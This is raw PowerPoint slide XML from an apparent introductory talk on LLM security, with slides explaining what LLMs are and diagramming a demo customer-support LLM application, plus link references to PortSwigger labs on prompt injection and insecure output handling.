              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025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8C607E1-0C2D-E0B8-F1CB-B1935E7828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15B25DA-92FA-20D8-CDB6-90917E2EE2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368953-5823-407F-9148-1AAD2C5C0A73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2314554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260328-D7A8-420F-5171-056FCC0AAD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E6D6FDD-3822-EB2D-472B-02395864CF0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6BC6603-6670-B56F-9B3E-76138369CC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5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025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1E77BA-B199-0CCE-C990-881BB417C0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37D8388-2A16-FE45-32C1-8C59A6AE2E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368953-5823-407F-9148-1AAD2C5C0A73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6334742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760D98-65B5-BC6E-5EF2-5C2425A5D8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AC446DE-08AA-6938-A618-F1E3CD21C9C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B6B67CB-EE1C-E9FE-2E39-F373D8A9E6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5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025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06B02A8-BEC3-89E5-0298-2E047F9525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291D89-681E-D54E-3330-8F3AF16DC8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368953-5823-407F-9148-1AAD2C5C0A73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7785258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B2D29E-360A-CAFC-836B-FDE96F0147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169DE2-22E2-1554-ADDD-6A4D9502515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4333116-EAF1-5714-EB36-318045DFFC9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568B6F8-524C-10D4-FE7D-0BCFD08796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5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025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D84E5DB-48BC-5BC0-679F-25B68D98E8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9AA59-1608-42B7-B919-62A8E68CE7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368953-5823-407F-9148-1AAD2C5C0A73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5274146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8FB2C4-5564-96B5-248D-A3E88836D3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70D379F-F746-67E8-3B74-4567993095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BD12270-C4F6-691D-0AE0-16C73DE05B3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0B3D86D-417D-3C28-1D3D-1DBBBBBA89A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2C4E11E-0512-5D5C-113F-581E387C0B2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29E9C44-28F1-CEB5-35D1-70EBDA6DF2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5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN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BB4A9CE-F361-40C5-1DBC-94B54E0786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DC44DF2-E726-22B4-26F4-8D48105F1C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368953-5823-407F-9148-1AAD2C5C0A73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1305136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6370C6-8303-0F27-E5C9-379AAE013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462F44C-9C4A-4C72-8C85-ACC2D8A509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5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN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63AF3E4-CB12-DF18-A7AF-2DB236038E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EAD736E-464C-8824-9C29-7FF80387AF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368953-5823-407F-9148-1AAD2C5C0A73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423560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E543795-E1E1-9FE8-B4F0-FB093B48EC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5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN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50857DA-6E04-3430-67D0-BA1C7047C1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6E5246A-88B6-B891-2163-CB36BFA8EC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368953-5823-407F-9148-1AAD2C5C0A73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9350814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D528D9-DF1F-F067-0B59-ECAAEDF406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B0A3FB9-50CD-73B0-2541-FA0B4EC672B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23F3AD6-D5EF-C380-7FCE-32953B9BFB5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7A3C0A6-C800-78DA-0547-DB3741E5C1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5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025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BD73D25-F5F7-F618-704E-53B2D3E299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4BEDE0B-F2F5-7913-9A9E-5949D0F1D3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368953-5823-407F-9148-1AAD2C5C0A73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5372630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B330F9-8073-0CA6-4225-300786BFB2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ECA5C0C-C813-FF81-60D3-602C18F2636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1DF5800-956E-A1D0-6D4A-6913A2D9662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4B7E90F-FAE7-DA6C-9340-E9AC3CA582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5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025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666A0F5-4434-6F6A-5575-D0ACB2231D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E387C3E-C94C-26A5-1F1B-297B35F379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368953-5823-407F-9148-1AAD2C5C0A73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7695920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2EE7492-964B-F3E0-9945-85BD7A5534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1172694-9B83-D5D2-83F5-606956DE795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EF83C14-2193-E440-F8AA-446AA3FE332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8F5356E-8756-4165-90F8-7CBF62931270}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>21-03-2025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320F4FF-05F4-81D1-542F-6DBDE348324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FB6FB27-67EB-223D-3506-ADD6188D9D3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F368953-5823-407F-9148-1AAD2C5C0A73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979824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sv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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId9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sv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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId9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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wd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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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7.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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15.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide22.xml"/><Relationship Id="rId16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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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g"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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g"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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2.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp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2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp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portswigger.net/web-security/llm-attacks/lab-indirect-prompt-injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp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2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp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portswigger.net/web-security/llm-attacks/lab-exploiting-insecure-output-handling-in-llms" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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70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5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.pn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7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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.pn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2.xml"/><Relationship Id="rId6" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto5.wdp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D38CA33-4829-641D-DE18-329B386931C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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CD4E753-C44D-A401-95AA-02145D6499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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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CAB6D534-C3BE-519D-F9E4-A29B9A19AB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8" y="73169"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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What Are LLM</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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CED4AE2-8408-B792-990F-3F1F707DEA36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1102397"/>
            <a:ext cx="11239499" cy="54476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l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IN" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>💬 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Core Concept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l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IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>LLMs = Supercharged Autocomplete"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l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IN" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>⌨️ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>How They Work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l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IN" b="1" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>"Your prompt: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>‘Explain quantum physics like I’m 5’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l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IN" b="1" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>Processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: "Breaks text into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>, uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>training data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l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IN" b="1" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: "Generates text by predicting patterns."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l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IN" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>💭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Key Terms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l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IN" b="1" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>Hallucination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>‘Astronauts found pizza on Mars in 2042!’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l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IN" b="1" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>Training Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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latin typeface="Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Like a chef who’s read millions of recipes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l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IN" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Why It Matters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l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IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Imperfect patterns → Security risks."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37ABAA5-5E3A-512E-2537-D1607B30E60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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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8702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AC2D96-DE2A-2D3E-5018-13452996BB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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D23BF76E-2C4B-93D6-2E51-B50032720C7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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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5380C0BD-1819-0F29-6FDE-5E116F1085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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Demo LLM Application Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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30D806EB-CB9C-52C5-908E-6FA978D3426C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7425267" y="1456267"/>
            <a:ext cx="4072466" cy="5190066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0EC31B4-9B03-8EB2-7000-D53D53A744FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8441266" y="1764793"/>
            <a:ext cx="20404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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LLM Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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5FA7FE0-2828-ED14-78BB-AD20269A78BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7759700" y="2590800"/>
            <a:ext cx="3403600" cy="83820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LLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GPT – 3.5</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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53D613B-9293-FFE0-28F7-3B64167550F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7759700" y="3962400"/>
            <a:ext cx="3403600" cy="668867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Orchestration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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8071606C-30BD-6B19-A05F-E8FB2E43B391}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7759700" y="5067299"/>
            <a:ext cx="3403600" cy="1172634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Knowledge Base</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Customer Support - Related Documents</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/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0052A2B4-FB20-1572-B65F-4A82A42150CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199468" y="3716867"/>
            <a:ext cx="1134532" cy="1092200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11" name="Graphic 10" descr="User with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C562BE-44B0-F267-842D-F6E5D94071E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309534" y="3716867"/>
            <a:ext cx="914400" cy="914400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DE5CE987-264F-7AF3-1F5D-B631C55C9459}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4445423" y="4446601"/>
            <a:ext cx="7112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User</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Graphic 14" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69FA3B96-FCA2-8923-3E12-38F1A9BD58F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5833745" y="3747816"/>
            <a:ext cx="914400" cy="606968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Graphic 15" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C62C2EE-0082-49A2-CD7A-510E4B8862A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10800000">
            <a:off x="5833745" y="4171058"/>
            <a:ext cx="914400" cy="606968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B76290-8516-D145-FC35-DEA74F3033F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5400000">
            <a:off x="8546352" y="3452443"/>
            <a:ext cx="473773" cy="426886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
